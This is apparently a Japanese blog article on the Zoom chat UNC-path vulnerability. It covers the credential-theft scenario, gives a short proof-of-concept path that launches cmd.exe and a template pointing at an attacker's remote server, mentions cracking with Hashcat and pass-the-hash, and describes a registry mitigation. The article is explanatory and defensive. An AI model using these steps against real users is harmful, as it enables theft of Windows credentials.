Zoomの脆弱性の確認方法(PoC)
Zoomの脆弱性を利用した攻撃手順(攻撃シナリオ)は以下の通りです。
※最新版にアップデートで対応可能なことがわかりました。こちらでご確認ください。Windowsの方、Macの方※尚、新しく見つかった脆弱性に関しては引き続き経過を追う必要があります
①Zoomのチャットに UNC(Universal Naming Convention)形式リンク(UNCパス)を送信するとリンクが生成されます
②Zoomのチャットにてリンクを押下するとリモートサーバ(攻撃者のサーバ)にNTLM認証情報(Credentials)が送信されます。
③リモートサーバ(攻撃者のサーバ)側で受け取ったNTLM認証情報は脆弱なためツールで1分かからずIDとパスワードが判明します。
新型コロナウイルス感染症(COVID-19)の影響で在宅勤務(リモート勤務)が増える中、Zoomの利用が増えた最中なのでインパクトが強い脆弱性です。
Zoomの公式ページはこちらです。更新情報は確認しましょう。
どういった場合に被害にあうリスクがあるかというと具体的には
発生条件は①同一のチャット内にいるメンバーが②チャット機能を利用し、③リンクを押下した際、④NTLM認証(主にWindows)を利用していた場合、認証情報が盗まれることになります。
機会:チャット内にいるメンバーに身知らぬ人が含まれる、悪意がある人が含まれていてもわからない不特定多数の勉強会や会議は危険です。一方、少人数で全員顔見知りの場合は攻撃は難しいでしょう。
手段:ツールはZip解析に利用されるHashcatなどで簡単にでクラックできてしまいます。
PoC:以下をZoomチャットで送って生成されたリンクを押下して動作するかで確認します(パスなどは環境に合わせ適時変更してください)
\\?\C:\Windows\System32\cmd.exe
電卓やノートパッドの起動でも良いです。攻撃にはリモートサーバのパスが利用されます。
\\(ここにリモートサーバ)\
Zoomの脆弱性の対策方法
パッチは現在公開されておりません。
リモートサーバにNTLM認証情報を飛ばさない設定を行う対策も可能ですが利用サービスへの影響を考慮した上で実施を検討ください。
①レジストリエディタに移動します。「Windowsキー」+「r」を押下してファイル名を指定して実行に「regedit」と入力
②HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0
③RestrictSendingNTLMTrafficの値をdword:00000002に設定してください
NTLM認証情報とは何か
現行のWindows OSで認証に用いられているNet-NTLMv2認証
①NTLMハッシュ値を鍵として、ドメイン名とユーザ名を連結したデータを、HMAC-MD5でハッシュ化する。
②NTLMハッシュ値とユーザ情報から生成したHMAC-MD5ハッシュ値を鍵として、サーバから送信されたチャレンジ値とクライアントで生成したチャレンジ値を連結したデータを、HMAC-MD5でハッシュ化する。
③チャレンジ値から生成したHMAC-MD5ハッシュ値に、クライアントで生成したハッシュ値を付加する。
まず、NTLMハッシュ値は平文パスワードをUnicodeに変換し、MD4によりハッシュ化したものです。
MD5が脆弱なのでお察しですがMD4も脆弱です。
そもそもPass-the-Hashの手法により、NTLMハッシュ値を平文パスワードに戻すことなく認証することができます。
NTLMハッシュ値のみでNet-NTLMv2応答値を生成できるわけですからNTLMハッシュ値さえ手に入ればいいわけです。
今回のZoomの脆弱性を悪用するとNTLMハッシュ値が外部に送られてしまうわけです。
危険性は理解できましたでしょうか。
以上です。参考になれば幸いです。